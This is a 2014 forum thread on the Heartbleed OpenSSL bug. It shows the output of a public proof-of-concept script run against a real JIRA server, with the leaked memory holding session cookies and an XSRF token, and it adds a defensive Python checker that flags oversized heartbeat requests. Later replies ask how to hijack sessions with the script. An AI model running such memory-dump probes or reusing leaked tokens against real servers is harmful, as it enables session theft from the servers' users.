    Security Override » Hacking » Website Hacking
    heartbleed.py exploit example
    04-14-2014 01:26 AM heartbleed.py exploit example
    The Heartbleed issue is actually worse than it might immediately seem (and it seems pretty bad already).

    In case you've been out of the loop, Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL that allows any remote user to dump some of the contents of the server's memory. And yes, that's really bad. The major concern is that a skilled user could craft an exploit that could dump the RSA private key that the server is using to communicate with its clients. The level of knowledge / skill required to craft this attack isn't particularly high, but likely out of reach for the average script kiddie user.

    So why is Heartbleed worse than you think? It's simple: the currently-available proof-of-concept scripts allow any client, anywhere in the world, to perform a session hijacking attack of a logged-in user.

    As of this morning, the most widely-shared proof-of-concept is this simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump a bit of RAM from a vulnerable server.

    Let's have a look at the output of this utility against a vulnerable server running the JIRA ticket tracking system. The hex output has been removed to improve readability.

    [matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
    Connecting...
    Sending Client Hello...
    Waiting for Server Hello...
    ... received message: type = 22, ver = 0302, length = 66
    ... received message: type = 22, ver = 0302, length = 3239
    ... received message: type = 22, ver = 0302, length = 331
    ... received message: type = 22, ver = 0302, length = 4
    Sending heartbeat request...
    ... received message: type = 24, ver = 0302, length = 16384
    Received heartbeat response:
    .@..GET /browse/
    en_US-cubysj-198
    8229788/6160/11/
    (lots of garbage)
    ..............Ac
    cept-Encoding: g
    zip,deflate,sdch
    ..Accept-Languag
    e: en-US,en;q=0.
    8..Cookie: atlas
    sian.xsrf.token=
    BWEK-0C0G-BSN7-V
    OZ1|3d6d84686dc0
    f214d0df1779cbe9
    4db6047b0ae5|lou
    t; JSESSIONID=33
    F4094F68826284D1
    8AA6D7ED1D554E..
    ..E.$3Z.l8.M..e5
    ..6D7ED1D554E...
    ......*..?.e.b..
    WARNING: server returned more data than it should - server is vulnerable!
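The output above shows why the bug is exploitable: the heartbeat response is a 16384-byte record (type 24, version 0302) even though a legitimate request would never warrant one that large. The defect is that the unpatched server trusts the 16-bit payload_length field inside the heartbeat message instead of checking it against the size of the record that actually arrived. As an added example (not code from the original post or from the linked gist), here is a defender-side checker in Python that applies the RFC 6520 length rule to a stream of TLS records and flags heartbeat messages whose declared payload cannot fit inside the record. The record layout and the constants (content type 24, version 0x0302, 16384) come from the thread's own output; the sample records are constructed, not captured traffic.

```python
"""Flag TLS heartbeat records whose declared payload length exceeds the record.

Added example for this thread; not code from the original post or the linked
script. Applies the RFC 6520 rule that patched OpenSSL enforces:
1 (type) + 2 (length) + payload + 16 (minimum padding) must fit in the record.
The sample records at the bottom are constructed, not captured traffic.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

TLS_HEARTBEAT = 24            # record content type for heartbeat (RFC 6520)
TLS_APPLICATION_DATA = 23
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520 section 4: padding is at least 16 bytes
TLS1_1 = 0x0302               # version seen in the thread's output ("ver = 0302")


@dataclass
class Verdict:
    offset: int                  # byte offset of the record in the stream
    content_type: int
    record_len: int              # bytes actually present in the record body
    hb_type: Optional[int]       # 1 = request, 2 = response, None = not heartbeat
    declared_len: Optional[int]  # payload_length field claimed by the sender
    malformed: bool
    reason: str


def parse_records(data: bytes) -> List[Tuple[int, int, int, bytes]]:
    """Split a byte stream into (offset, content_type, version, body) records."""
    records = []
    off = 0
    while off + 5 <= len(data):
        ctype, ver, length = struct.unpack("!BHH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]   # may be short if the stream is truncated
        records.append((off, ctype, ver, body))
        off += 5 + len(body)
    return records


def check_heartbeat(body: bytes) -> Tuple[Optional[int], Optional[int], bool, str]:
    """Return (hb_type, declared_len, malformed, reason) for one heartbeat body."""
    if len(body) < 3:
        return None, None, True, "body too short to hold type and payload_length"
    hb_type = body[0]
    declared = struct.unpack("!H", body[1:3])[0]
    if 1 + 2 + declared + MIN_PADDING > len(body):
        return hb_type, declared, True, (
            f"declared payload {declared} plus header and padding exceeds "
            f"record body of {len(body)} bytes")
    return hb_type, declared, False, "lengths consistent"


def inspect(data: bytes) -> List[Verdict]:
    """Run the heartbeat length check over every record in a stream."""
    verdicts = []
    for off, ctype, _ver, body in parse_records(data):
        if ctype != TLS_HEARTBEAT:
            verdicts.append(Verdict(off, ctype, len(body), None, None, False, "not heartbeat"))
            continue
        hb_type, declared, bad, why = check_heartbeat(body)
        verdicts.append(Verdict(off, ctype, len(body), hb_type, declared, bad, why))
    return verdicts


def build_record(ctype: int, body: bytes, ver: int = TLS1_1) -> bytes:
    """Wrap a body in a TLS record header (helper for the constructed samples)."""
    return struct.pack("!BHH", ctype, ver, len(body)) + body


# Constructed samples (not captured traffic).
WELL_FORMED = build_record(
    TLS_HEARTBEAT,
    bytes([HB_REQUEST]) + struct.pack("!H", 4) + b"ping" + b"\x00" * MIN_PADDING)
# Claims a 16384-byte payload but carries none: the pattern a patched server
# discards and an IDS should alert on.
OVERSIZED_CLAIM = build_record(
    TLS_HEARTBEAT, bytes([HB_REQUEST]) + struct.pack("!H", 16384))
APP_DATA = build_record(TLS_APPLICATION_DATA, b"\x00" * 32)

if __name__ == "__main__":
    for v in inspect(WELL_FORMED + OVERSIZED_CLAIM + APP_DATA):
        flag = "ALERT" if v.malformed else "ok   "
        print(f"{flag} offset={v.offset} type={v.content_type} "
              f"hb_type={v.hb_type} declared={v.declared_len} "
              f"actual={v.record_len}: {v.reason}")
```

The comparison in check_heartbeat is the same bounds check the OpenSSL 1.0.1g fix added before copying the payload back into the response; an unpatched server skips it and memcpy's payload_length bytes from wherever the request happened to land in memory, which is where the cookies in the dump above came from. Run over a pcap's reassembled TLS stream, the same function gives a simple network-side detection for heartbeat probes, independent of whether the server behind it is patched.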
    04-14-2014 11:27 PM RE: heartbleed.py exploit example
    The gist.github link doesn't work, however.
    04-19-2014 03:14 PM RE: heartbleed.py exploit example
    The script is uploaded by override! in the code section, under the name heartbleed.py.
    04-20-2014 04:29 PM RE: heartbleed.py exploit example
    Could you elaborate on how to session hijack with heartbleed?
    04-20-2014 04:29 PM RE: heartbleed.py exploit example
    Not server hijacking. I meant using heartbleed and the information you get from it to perform a session hijack to a user somewhere in the world.